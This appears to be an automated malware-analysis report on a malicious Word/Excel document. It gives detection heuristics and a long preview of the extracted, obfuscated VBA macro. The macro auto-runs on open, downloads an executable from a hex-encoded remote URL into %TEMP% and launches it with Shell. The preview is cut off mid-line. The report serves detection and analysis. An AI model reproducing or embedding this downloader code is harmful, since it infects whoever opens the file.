MALICIOUS
332
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains heavily obfuscated VBA macros with multiple auto-execution triggers (Auto_Open, AutoOpen). These macros utilize CreateObject and Shell calls, indicating an attempt to download and execute a secondary payload. The presence of the email address 'facepa1m@live.ru' within the document's metadata suggests a potential phishing lure.
Heuristics 11
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22028 bytes |
SHA-256: f0f7e02ac879d1c16548421e122bb9093fe21c24f0f5e83be7a406ce788d6150 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln
Dim yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6267746C6769776F71786A746A776366746F717363787A676D76616579646974776B7A6E76716E657877626C6B637A")) For Binary As #6384
Put #6384, , yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz
Close #6384
imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln:
GoTo qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse
Dim vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626379736962776671637962616E726C7373666977687A63676C626E6465786E72666375796D6C6E70727A6A686870")) For Binary As #34446
Put #34446, , vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv
Close #34446
qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse:
GoTo smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj
Dim jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6C6169707A7668656E6B7A7479696F6D6A767A68636D65666F77746A686265646D726F6E656E766970646676766373")) For Binary As #36904
Put #36904, , jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax
Close #36904
smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj:
TFCVDJEJBJJ
End Sub
Sub AutoOpen()
GoTo fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr
Dim crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("66657561766C6C6E6176707776767566727561676376747A66627972726267707864646B7A6662716A6F7570616D6773")) For Binary As #43632
Put #43632, , crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Close #43632
fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr:
GoTo vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx
Dim qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636C7873776E7179776D6663616E616D797A7773786679786679767275716677726464666F64666B6D77797562637967")) For Binary As #13653
Put #13653, , qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual
Close #13653
vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx:
GoTo tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply
Dim eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6A6C6871746477686C68796566726A7967686B686A776A6B6777686D6E6276657476787178616D67696C6F6177616B")) For Binary As #41695
Put #41695, , eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue
Close #41695
tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq
Dim dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E7266636D737576777A776675616D6A6B757969637A7363737A796A6E6D726A61626E6A7571686C7071747669786469")) For Binary As #49957
Put #49957, , dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Close #49957
ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq:
GoTo hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm
Dim kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69617A61796665776F78646D746C70637A676D736977616562736C786E676D686169686D6D697367686D656765716A78")) For Binary As #14350
Put #14350, , kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug
Close #14350
hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm:
GoTo ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh
Dim mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("727A6C6B7A697877706D6870686A6761746766666D677A726F6D64616563746B6565747A6C7876656C796D6E686C7867")) For Binary As #34623
Put #34623, , mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Close #34623
ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh:
Auto_Open
End Sub
Function OJFXJUFZDBX(ByVal XDQPBMZWZVE As String, ByVal EBDHKIKBOCB As String) As Boolean
Dim WQTQGAKEBGH As Object, ZIOOUFBOHTB As Long, JFDTBJWPCNU As Long, WGZWKGZMUTY() As Byte
GoTo etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny
Dim kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("79796774646A676D6D6A6166766E7666646A6C6277727A65766D616B6D74736B6B6B6174786269796D76696D66617564")) For Binary As #46512
Put #46512, , kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd
Close #46512
etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny:
GoTo jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb
Dim zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636E736671657761666C6172776974687A74746373646965636B766E7562686375717977626E786E7573736B686A7275")) For Binary As #17297
Put #17297, , zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl
Close #17297
jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb:
Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
GoTo pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk
Dim gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6472767373796467716976697778686172696B69636B7A68716B796468707075677879797474646B7363786F716F7771")) For Binary As #67645
Put #67645, , gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu
Close #67645
pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk:
GoTo iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd
Dim jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72677577626E6F7175726F6371796B676A79716D6A627867666F7277626F787173656A63796F68757564666F6D676364")) For Binary As #23692
Put #23692, , jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm
Close #23692
iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd:
GoTo crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Dim hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666E687179626A7770647A626D73736A6A72636F746D646B727172776578637674796D6261766F61676E66716D657161")) For Binary As #69554
Put #69554, , hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio
Close #69554
crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi:
WQTQGAKEBGH.Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("544547")), XDQPBMZWZVE, False
GoTo yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo
Dim ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("75686E786874646371726B7563696D706766636C6866617270737779777272686678706774726B73796F7864746F6576")) For Binary As #16460
Put #16460, , ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius
Close #16460
yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo:
GoTo nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm
Dim cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6A6F656772767075687071756F6B6F6D706B64786572696A62766D7A67727161726C686E6F74716D61706B6F687061")) For Binary As #64341
Put #64341, , cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz
Close #64341
nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm:
GoTo adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih
Dim xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("62796E736B646B7471776E66696268746878677A7163656F72746E6F736877756663696276727773657A716A73706B6B")) For Binary As #97034
Put #97034, , xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw
Close #97034
adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih:
WQTQGAKEBGH.Send "send request"
GoTo dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Dim jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C74636564757A697569746F6A69656A757064787166717475766E6668617A796F67766D66617866726C746263647764")) For Binary As #97193
Put #97193, , jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc
Close #97193
dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw:
GoTo hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb
Dim uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6568766564676575626A6373766562736A7569656A6C61697173726D75747168656670646C737774776B6C696C767377")) For Binary As #46676
Put #46676, , uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn
Close #46676
hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb:
GoTo mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Dim arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F6D766665707867636B627867766278656968727568646570666A6270756C6D677068727274627A687A656E79756668")) For Binary As #90494
Put #90494, , arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf
Close #90494
mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm:
Do While WQTQGAKEBGH.readyState <> 4
GoTo phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf
Dim ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69776E6A6D746368626975746F737A796B77696C7A6F74756267786D6A646F75666E76706A726F6968766B6665637163")) For Binary As #96367
Put #96367, , ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg
Close #96367
phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf:
GoTo ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm
Dim wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6373726869696E6F756F79726B646E756E686F73696D706368756C69686268796672786B62786E667472706E676A7974")) For Binary As #5726
Put #5726, , wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq
Close #5726
ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm:
GoTo ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn
Dim bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A786664736963796569646F776B67736C6A6E646D65726163686477757A7769616E766D6D716C716977646167636E73")) For Binary As #14676
Put #14676, , bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp
Close #14676
ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn:
DoEvents
GoTo hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz
Dim nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626979656661726C6873676A6E6F6465656B677466796879747269617074716B7A646E666971736F6A686771697765")) For Binary As #23763
Put #23763, , nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb
Close #23763
hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz:
GoTo qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq
Dim eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6669786C7274756A7776787163686A78757778726E766D6E626177696B66736372676D6361646A6B7665667A65627775")) For Binary As #56197
Put #56197, , eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu
Close #56197
qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq:
GoTo bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx
Dim vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6873726E786D6A656A62696164666A656E636F6466696C6D7867696A6D686C7471796678707074727371626F76656D70")) For Binary As #43904
Put #43904, , vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep
Close #43904
bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx:
Loop
GoTo eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer
Dim vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666C79757578746678646163786271716F6C6B627A746861786678766F6472706C696F747A6F627A776B6B7663746B71")) For Binary As #95145
Put #95145, , vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi
Close #95145
eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer:
GoTo aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk
Dim hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C78746E63796E7175746E657A6E706B7570687A61786D6479716764776F6E6764726D62627A6676616C707771687561")) For Binary As #37532
Put #37532, , hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc
Close #37532
aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk:
GoTo cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy
Dim zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E666B78646E6B756D75746D6C676B747A627261666264726E776975666668766E737261716B6177716A6178636E6669")) For Binary As #93158
Put #93158, , zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare
Close #93158
cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy:
WGZWKGZMUTY = WQTQGAKEBGH.responseBody
GoTo ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh
Dim dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766B7161756870656B616768766E666F6F6671756F656F78757961756D676964656F796E77787173627A736469797479")) For Binary As #28613
Put #28613, , dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq
Close #28613
ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh:
GoTo cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp
Dim sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("617161727568786B6E7A6E64717062646F62726F6C77777475746A666B74706A71687663736D617368737263706E636A")) For Binary As #44114
Put #44114, , sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr
Close #44114
cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp:
GoTo zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek
Dim wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("706F6A6A746675736F6867686E666774636168616569737374787065756C766A727765716E63796F6E69776C726B626A")) For Binary As #63553
Put #63553, , wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah
Close #63553
zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek:
JFDTBJWPCNU = FreeFile
GoTo qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg
Dim lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72696B7672646E7972687467646A6E6B706E77766263657A6B686C776961636B6E6D666E6C6B637674676F7361767672")) For Binary As #56956
Put #56956, , lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm
Close #56956
qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg:
GoTo wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt
Dim ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("676375666371726F7975616B746B73716862617464677161716A6E6A686E626D73777166686F66797073797477646D6F")) For Binary As #60915
Put #60915, , ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi
Close #60915
wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt:
GoTo aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi
Dim tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F7A696661767576636D74666F6A746A7A7575676A6A6778747A716A6E6D73737065757567736F786D626467646B7173")) For Binary As #34306
Put #34306, , tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Close #34306
aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi:
If Dir(EBDHKIKBOCB) <> StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("")) Then Kill EBDHKIKBOCB
Open EBDHKIKBOCB For Binary As #JFDTBJWPCNU
Put #JFDTBJWPCNU, , WGZWKGZMUTY
Close #JFDTBJWPCNU
GoTo fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba
Dim gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("74686A6A726F6A636B74626E6578667A6B6565676E7763726C6B6B70766C6E61626C65697A6A7779787467646D68616D")) For Binary As #99823
Put #99823, , gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs
Close #99823
fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba:
GoTo qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq
Dim irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("797661796D71726A65776E6A66787976696E7774646C7A786E6C6E6E78776C697166747A616D76746C6D666462767964")) For Binary As #66032
Put #66032, , irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes
Close #66032
qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq:
GoTo dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc
Dim mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("646A71767067786F736A6C7763737661627279676E646275686E6B6A7A727573716D6879727061727A6E617768636266")) For Binary As #40444
Put #40444, , mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu
Close #40444
dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc:
Dim WBVSWOEAZVI
GoTo dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx
Dim psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6F70747A646F62716B6871747A77716565637970656F697A6A6D7A6E646A626F656A7563616E73657A6268796C636A")) For Binary As #66538
Put #66538, , psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx
Close #66538
dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx:
GoTo pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly
Dim ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6B6A6474627A6F7378777A7A696C6A76706D766A656B6872647266677479646A65626B766267716776716262676676")) For Binary As #34151
Put #34151, , ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe
Close #34151
pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly:
GoTo msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy
Dim nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766363796A66617577786C7761617777767A6F78787461746D707A62696475627574776C796E7975687973716E777566")) For Binary As #13237
Put #13237, , nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq
Close #13237
msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy:
WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
GoTo bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh
Dim iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766C6A6E7A69716F6474776568776E706E6966677069757A78726474687A6B6C6B75756562627465626D6471746C6966")) For Binary As #76791
Put #76791, , iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq
Close #76791
bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh:
GoTo uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl
Dim gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756E67756F766D667A6B796678736163796E76716C726E656C6C6673686563786E6B6E6E706B616B6575636261667071")) For Binary As #37069
Put #37069, , gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed
Close #37069
uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl:
Set WQTQGAKEBGH = Nothing
GoTo tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd
Dim jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("7A6A68697470626C7274796D6B69716D77796B6C7268657879636F7A76696D6D777A7873717A6477686162716569617A")) For Binary As #47174
Put #47174, , jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck
Close #47174
tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd:
GoTo iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq
Dim okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6268727077696F7366767677677470777372746467746862717070647374776D676F6E7869786C706769686D64777272")) For Binary As #21343
Put #21343, , okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw
Close #21343
iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq:
GoTo tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Dim tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis As String
